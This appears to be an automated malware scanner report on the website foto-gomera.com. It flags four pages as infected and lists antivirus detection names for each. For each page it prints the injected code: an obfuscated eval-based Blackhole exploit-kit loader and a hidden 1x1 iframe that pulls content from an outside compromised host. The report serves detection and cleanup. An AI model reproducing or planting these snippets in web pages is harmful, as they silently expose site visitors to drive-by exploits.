Malware Scanner report for foto-gomera.com

Malicious/Suspicious/Total urls checked: 4/0/5

4 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "foto-gomera.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=foto-gomera.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://foto-gomera.com/	200 OK Content-Length: 10995 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) try{bgewg346tr++}catch(aszx){try{dsgdsg-142}catch(dsfsd){try{window.document.body++}catch(gdsgsdg){dbshre=202;}}}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,117,104,105,98,26,56,23,92,104,93,112,100,93,103,110,41,90,106,94,91,111,92,61,101,95,104,92,102,109,34,34,96,94,107,91,104,92,31,34,53,8,1,24,25,26,27,113,105,106,99,41,106,106,92,26 ... 970 bytes are skipped ...,24,25,26,27,23,24,25,94,106,90,109,102,95,105,107,38,112,108,100,107,93,33,33,55,91,97,111,26,100,91,53,85,33,117,104,105,98,86,34,23,54,53,41,95,96,110,55,33,36,50,5,3,26,27,23,24,25,26,27,23,92,104,93,112,100,93,103,110,41,94,93,109,63,103,92,101,94,104,111,57,113,66,94,35,30,114,106,107,100,30,33,39,91,107,103,93,103,94,62,95,97,101,94,35,113,105,106,99,36,50,5,3,26,27,23,24,118,7,5,116,33,33,35,54);s="";for(i=0;i-495!=0;i++){if(020==0x10)s+=String.fromCharCode(1*asgq[i]-(i%5-9));}z=s;e(z);} Antivirus reports: AntiVir JS/BlacoleRef.W.79 Avast JS:Decode-ML [Trj] Ikarus Exploit.JS.Blacole nProtect JS:Trojan.Crypt.KK K7AntiVirus Riskware Comodo TrojWare.JS.BlacoleRef.W McAfee-GW-Edition JS/Exploit-Blacole.gc DrWeb JS.IFrame.369 Kaspersky Exploit.JS.Agent.bmh Microsoft Exploit:JS/Blacole.KH MicroWorld-eScan JS:Trojan.Crypt.KK Fortinet JS/Agent.BMH!exploit Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.gc NANO-Antivirus Trojan.Script.Agent.bdetht F-Secure JS:Trojan.Crypt.KK F-Prot JS/IFrame.RS.gen AVG HTML/Framer Norman Crypt.BKSD GData JS:Trojan.Crypt.KK Commtouch JS/IFrame.RS.gen BitDefender JS:Trojan.Crypt.KK
http://foto-gomera.com/md8_history.js	200 OK Content-Length: 20115 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function() { var a = document.createElement('iframe'); a.src = 'http://foxdesign.home.pl//wp-admin/user/cnt.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '1px'; a.style.width = '1px'; a.style.left = '1px'; a.style.top = '1px'; if(!document.getElementById('adpl')) { document.write('<div id=\'adpl\'></div>'); document.getElementById('adpl').appendChild(a); } })(); Antivirus reports: AntiVir HTML/ExpKit.Gen3 Avast JS:Iframe-AHX [Trj] Ikarus Trojan.IframeRef nProtect JS:Trojan.Script.AAL TrendMicro-HouseCall JS_BLACOLE.SMJF Comodo TrojWare.JS.Iframe.VR McAfee-GW-Edition JS/Exploit-Blacole.jq TrendMicro JS_BLACOLE.SMJF Kaspersky Trojan.JS.Redirector.ye Microsoft Trojan:JS/BlacoleRef.CL MicroWorld-eScan JS:Trojan.Script.AAL Fortinet JS/Redir.BBEQ!tr McAfee JS/Exploit-Blacole.jq NANO-Antivirus Trojan.Script.Iframe.bcslpm F-Secure JS:Trojan.Script.AAL F-Prot JS/IFrame.RS.gen AVG HTML/Framer Norman Blacole.PT GData JS:Trojan.Script.AAL Commtouch JS/IFrame.RS.gen BitDefender JS:Trojan.Script.AAL
http://foto-gomera.com/md8_design.js	200 OK Content-Length: 3584 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function() { var a = document.createElement('iframe'); a.src = 'http://foxdesign.home.pl//wp-admin/user/cnt.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '1px'; a.style.width = '1px'; a.style.left = '1px'; a.style.top = '1px'; if(!document.getElementById('adpl')) { document.write('<div id=\'adpl\'></div>'); document.getElementById('adpl').appendChild(a); } })(); Antivirus reports: AntiVir HTML/ExpKit.Gen3 Avast JS:Iframe-AHX [Trj] Ikarus Trojan.IframeRef nProtect JS:Trojan.Script.AAL TrendMicro-HouseCall JS_BLACOLE.SMJF Comodo TrojWare.JS.Iframe.VR McAfee-GW-Edition JS/Exploit-Blacole.jq TrendMicro JS_BLACOLE.SMJF Kaspersky Trojan.JS.Redirector.ye Microsoft Trojan:JS/BlacoleRef.CL MicroWorld-eScan JS:Trojan.Script.AAL Fortinet JS/Redir.BBEQ!tr McAfee JS/Exploit-Blacole.jq NANO-Antivirus Trojan.Script.Iframe.bcslpm F-Secure JS:Trojan.Script.AAL F-Prot JS/IFrame.RS.gen AVG HTML/Framer Norman Blacole.PT GData JS:Trojan.Script.AAL Commtouch JS/IFrame.RS.gen BitDefender JS:Trojan.Script.AAL
http://foto-gomera.com/md8lib.js	200 OK Content-Length: 43739 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function() { var a = document.createElement('iframe'); a.src = 'http://foxdesign.home.pl//wp-admin/user/cnt.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '1px'; a.style.width = '1px'; a.style.left = '1px'; a.style.top = '1px'; if(!document.getElementById('adpl')) { document.write('<div id=\'adpl\'></div>'); document.getElementById('adpl').appendChild(a); } })(); Antivirus reports: AntiVir HTML/ExpKit.Gen3 Avast JS:Iframe-AHX [Trj] Ikarus Trojan.IframeRef nProtect JS:Trojan.Script.AAL TrendMicro-HouseCall JS_BLACOLE.SMJF Comodo TrojWare.JS.Iframe.VR McAfee-GW-Edition JS/Exploit-Blacole.jq TrendMicro JS_BLACOLE.SMJF Kaspersky Trojan.JS.Redirector.ye Microsoft Trojan:JS/BlacoleRef.CL MicroWorld-eScan JS:Trojan.Script.AAL Fortinet JS/Redir.BBEQ!tr McAfee JS/Exploit-Blacole.jq NANO-Antivirus Trojan.Script.Iframe.bcslpm F-Secure JS:Trojan.Script.AAL F-Prot JS/IFrame.RS.gen AVG HTML/Framer Norman Blacole.PT GData JS:Trojan.Script.AAL Commtouch JS/IFrame.RS.gen BitDefender JS:Trojan.Script.AAL
http://foto-gomera.com/test404page.js	200 OK Content-Length: 226 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: foto-gomera.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Dec 2014 21:04:32 GMT
ETag: "755f5a3-2af3-4d0eb54890340"
Server: Apache
Vary: Accept-Encoding
Content-Length: 10995
Content-Type: text/html
Last-Modified: Sat, 15 Dec 2012 22:04:21 GMT
X-Handling: relax
X-UD-Host: webspace.udag.de
X-UD-Loopcounter: 3
X-UD-Method: urlhiding
X-UD-REMOTE_ADDR: 78.158.11.226
X-UD-Target: http://www.infogomera.com/fotogomeracom

...10995 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: foto-gomera.com
Referer: http://www.google.com/search?q=foto-gomera.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for foto-gomera.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools